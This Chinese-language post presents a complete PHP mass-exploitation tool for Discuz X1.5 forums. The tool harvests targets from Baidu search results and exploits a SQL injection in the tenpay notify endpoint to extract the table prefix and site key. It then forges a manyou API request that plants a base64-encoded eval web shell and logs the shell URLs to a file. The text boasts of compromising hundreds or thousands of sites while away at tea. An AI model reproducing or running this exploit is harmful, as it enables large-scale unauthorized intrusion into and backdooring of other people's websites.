|
通常一个0day流出到官方出补丁,这段时间大家是不是通过baidu或google搜索关键字在努力的日站,如果你是手工入侵可能你三天黑的站,还没我一个小时黑得多。
下面以DZ x1.5 的getshell为例,原理很简单,通过百度挖掘关键字,从第一页往下一页一页的判断是否是DZ系统,是否存在漏洞,然后批量getshell。这时,我们出去喝杯茶,吃个饭,回来已经黑了几百上千个站了。
通过这个例子,我们可以看出工具能为我们节约很多时间,节约很多人力,但还是要理解工具实现的原理,这样才能事半功倍。
- <?php
- error_reporting(E_ERROR);
- set_time_limit(0);
- $keyword = 'inurl:/forum.php';//百度搜索关键字
- $timeout = 10; //读取网页超时(秒)
- $stratpage = 1; //读取百度起始页
- $lastpage = 100; //读取百度尾页
- function ReadBaiduList($keyword,$timeout,$nowpage) //返回该页DZ网址列表Array
- {
- $tmp = array();
- $data = '';
- $nowpage = ($nowpage-1)*10;
- $fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
- @fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n");
- while ($fp && !feof($fp))
- $data .= fread($fp, 1024);
- @fclose($fp);
- preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
- $num = count($tmp[1]);
- $array = array();
- for($i = 0;$i < $num;$i++)
- {
- $row = explode('/',$tmp[1][$i]);
- $array[] = str_replace('http://','',$row[0]);
- }
- return $array;
- }
- function fw($filename,$filecode,$filemode)
- {
- $handle = @fopen($filename,$filemode);
- $key = @fputs($handle,$filecode);
- @fclose($handle);
- return $key;
- }
- function sign($exp_str)
- {
- return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");
- }
- function send($host,$path,$tmp_expstr,$timeout)
- {
- $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr);
- return POST($host,80,$path,$expdata,$timeout);
- }
- function POST($host,$port,$path,$data,$timeout,$cookie='') {
- $buffer = '';
- $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
- fputs($fp, "POST $path HTTP/1.0\r\n");
- fputs($fp, "Host: $host\r\n");
- fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
- fputs($fp, "Content-length: ".strlen($data)."\r\n");
- fputs($fp, "Connection: close\r\n\r\n");
- fputs($fp, $data."\r\n\r\n");
- while(!feof($fp)){$buffer .= fgets($fp,1024);}
- fclose($fp);
- return $buffer;
- }
- for($p = $stratpage;$p <= $lastpage;$p++)
- {
- $ReadList = ReadBaiduList($keyword,$timeout,$p);
- foreach($ReadList as $host)
- {
- $pre = 'pre_';
- $path = '/api/trade/notify_credit.php';
- $tmp_expstr = "'";
- $hash = array();
- $hash = array_merge($hash, range(48, 57));
- $hash = array_merge($hash, range(97, 102));
- $res = send($host,$path,$tmp_expstr,$timeout);
- ob_end_flush();
- if(!stristr($res,'SQL syntax')) {var_dump($res); echo "$host I can ont hack it.\n"; continue;}
- $match = array();
- preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);
- if($match[1]) $pre = $match[1];
- $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";
- $res = send($host,$path,$tmp_expstr,$timeout);
- if(stristr($res,"doesn't exist"))
- {
- echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";
- for($i = 1;$i < 20;$i++)
- {
- $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";
- $res = send($host,$path,$tmp_expstr,$timeout);
- if(stristr($res,'SQL syntax'))
- {
- $pre = '';
- $hash2 = array();
- $hash2 = array_merge($hash2, range(48, 57));
- $hash2 = array_merge($hash2, range(97, 122));
- $hash2[] = 95;
- for($j = 1;$j <= $i; $j++){
- for ($k = 0; $k <= 255; $k++) {
- if(in_array($k, $hash2)) {
- $char = dechex($k);
- $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";
- $res = send($host,$path,$tmp_expstr,$timeout);
- if(stristr($res,'SQL syntax')){
- echo chr($k);
- $pre .= chr($k);break;
- }
- }
- }
- }
- if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{echo 'GET Table_pre Failed..'; continue;};
- }
- }
- };
- echo "$host Please Waiting....\n";
- $sitekey = '';
- for($i = 1;$i <= 32; $i++){
- for ($k = 0; $k <= 255; $k++) {
- if(in_array($k, $hash)) {
- $char = dechex($k);
- $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";
- $res = send($host,$path,$tmp_expstr,$timeout);
- if(stristr($res,'SQL syntax')){
- echo chr($k);
- $sitekey .= chr($k);break;
- }}}}
- if(strlen($sitekey)!=32)
- {
- echo "\nmy_sitekey not found. try blank my_sitekey\n";
- }
- else echo "\nmy_sitekey:{$sitekey}\n";
- echo "\nUploading Shell...";
- $module = 'video';
- $method = 'authauth';
- $params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';
- $sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);
- $data = "module=$module&method=$method¶ms=$params&sign=$sign";
- $path2 = "/api/manyou/my.php";
- POST($host,80,$path2,$data,$timeout);
- echo "\nGetting Shell Location...\n";
- $file = '';
- for($i = 1;$i <= 32; $i++){
- for ($k = 0; $k <= 255; $k++) {
- if(in_array($k, $hash)) {
- $char = dechex($k);
- $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='";
- $res = send($host,$path,$tmp_expstr,$timeout);
- if(stristr($res,'SQL syntax')){
- echo chr($k);
- $file .= chr($k);break;
- }
- }
- }
- }
- $thisshell = "http://$host/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php";
- echo "\nShell: ".$thisshell,"\n";
- fw('shell.txt',$thisshell."\r\n",'a');
- }
- }
- ?>
|
推荐
评论(5条)
